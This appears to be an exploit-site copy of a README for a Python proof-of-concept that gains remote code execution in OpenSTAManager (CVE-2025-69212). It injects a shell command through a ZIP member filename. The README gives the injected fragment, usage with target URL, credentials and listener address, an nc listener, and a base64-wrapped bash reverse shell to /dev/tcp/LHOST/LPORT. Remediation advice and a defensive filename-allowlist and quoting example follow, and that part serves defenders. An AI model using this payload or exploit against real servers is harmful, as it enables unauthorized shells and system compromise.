## https://sploitus.com/exploit?id=BF7DCB0D-BCFB-51E5-B8DF-4705A1E07674
# CVE-2025-69212 - OpenSTAManager OS Command Injection (RCE)
Proof-of-concept exploit for **CVE-2025-69212**, an OS Command Injection vulnerability in OpenSTAManager.

**Injected filename fragment:**
```
;echo ".p7m
```
**Resulting shell execution:**
```bash
openssl smime ... -in "invoice.p7m";;echo ".p7m" ...
#                                  ^^^^^^^^^^^^^ injected here (the second `;` and everything after it come from the filename)
```
> **Note:** The forward slash `/` cannot appear directly in the filename because `ZipArchive::extractTo()` treats it as a path separator. The PoC avoids this by base64-encoding the reverse shell payload.
---
## Requirements
- Python 3.x
- `requests` library
- Valid OpenSTAManager credentials (any role with access to the import plugin)
- A listener on the attacker machine (e.g. `nc`)
Install dependencies:
```bash
pip install requests
```
---
## Usage
```bash
python3 CVE-2025-69212.py -u <url> -U <username> -P <password> --lhost <lhost> --lport <lport> [--proxy <proxy>]
```
### Options
| Argument | Required | Description |
|---|---|---|
| `-u`, `--url` | Yes | Target base URL (e.g. `http://target.htb`) |
| `-U`, `--username` | Yes | OpenSTAManager username |
| `-P`, `--password` | Yes | OpenSTAManager password |
| `--lhost` | Yes | Your IP address for the reverse shell |
| `--lport` | Yes | Your listening port for the reverse shell |
| `--proxy` | No | HTTP proxy (e.g. `http://127.0.0.1:8080`) |
### Example
```bash
# Start listener
nc -lvnp 4444
# Run exploit
python3 CVE-2025-69212.py -u http://target.htb -U admin -P 'password' --lhost 10.10.14.5 --lport 4444
# Route through Burp Suite
python3 CVE-2025-69212.py -u http://target.htb -U admin -P 'password' --lhost 10.10.14.5 --lport 4444 --proxy http://127.0.0.1:8080
```
---
## How It Works
1. **Authentication** - Logs into OpenSTAManager using the provided credentials
2. **Payload building** - Constructs a ZIP archive containing a `.p7m` file whose filename includes the injected command
3. **Base64 encoding** - The reverse shell (`bash -i >& /dev/tcp/LHOST/LPORT 0>&1`) is base64-encoded to avoid forward slashes in the filename
4. **Upload** - POSTs the ZIP to `/actions.php` via the `importFE_ZIP` plugin
5. **Execution** - The server extracts the ZIP and passes the malicious filename to `exec()`, triggering the reverse shell
6. **Threading** - The upload runs in a daemon thread, since bash holds the HTTP connection open; the script exits cleanly without waiting for a response
---
## Remediation
Update to OpenSTAManager **2.9.9 or later**, which sanitizes filenames before passing them to shell commands.
If patching immediately is not possible, disable the `importFE_ZIP` plugin or restrict access to `/actions.php` to trusted users only.
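The two controls the fix relies on, as an added Python example that is not code from OpenSTAManager or from this PoC: member names are checked against a strict allowlist before anything is extracted, and a name that does reach a shell command is quoted as a single argument (`shlex.quote()` here plays the role PHP's `escapeshellarg()` would). The allowlist pattern, the in-memory sample archive and the `openssl smime` flags are assumptions made for the demonstration.

```python
"""Defender-side checks for ZIP uploads whose member names end up in a shell command."""
import io
import re
import shlex
import zipfile

# Assumed allowlist: a plain basename with a known extension, no shell
# metacharacters, no quotes, no whitespace and no path separators.
SAFE_MEMBER_NAME = re.compile(r"^[A-Za-z0-9][A-Za-z0-9._-]{0,127}\.(p7m|xml)$", re.IGNORECASE)


def unsafe_member_names(zip_bytes: bytes) -> list[str]:
    """Return every member name in the archive that fails the allowlist.

    The check runs on the central directory before extraction, so a hostile
    name never reaches extractTo() or a command line. Directory entries are
    rejected too, since the import expects flat files.
    """
    bad = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if info.is_dir() or not SAFE_MEMBER_NAME.fullmatch(info.filename):
                bad.append(info.filename)
    return bad


def openssl_command(member_name: str) -> str:
    """Build the decode command with the filename quoted as one argument.

    Interpolating the name into double quotes lets a name containing `";`
    close the argument and start a new command; shlex.quote() single-quotes
    the whole name so it stays a single argv entry. Flags are assumed.
    """
    return ("openssl smime -verify -noverify -inform DER -in "
            f"{shlex.quote(member_name)} -out decoded.xml")


def build_sample_zip() -> bytes:
    """Construct an in-memory archive with one benign and one hostile member name."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("invoice.p7m", b"benign")
        # Constructed name following the breakout pattern shown above.
        zf.writestr('invoice.p7m";;echo ".p7m', b"hostile")
    return buf.getvalue()


if __name__ == "__main__":
    print("rejected:", unsafe_member_names(build_sample_zip()))
    print(openssl_command('invoice.p7m";;echo ".p7m'))
```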
---
## Disclaimer
This tool is intended for **authorized security testing and educational purposes only**. Use only on systems you own or have explicit written permission to test. Unauthorized use against systems you do not own is illegal and unethical. The author is not responsible for any misuse or damage caused by this tool.
---
## References
- [GHSA-25fp-8w8p-mx36](https://github.com/advisories/GHSA-25fp-8w8p-mx36)
- [OpenSTAManager GitHub](https://github.com/devcode-it/openstamanager)
- [NVD - CVE-2025-69212](https://nvd.nist.gov/vuln/detail/CVE-2025-69212)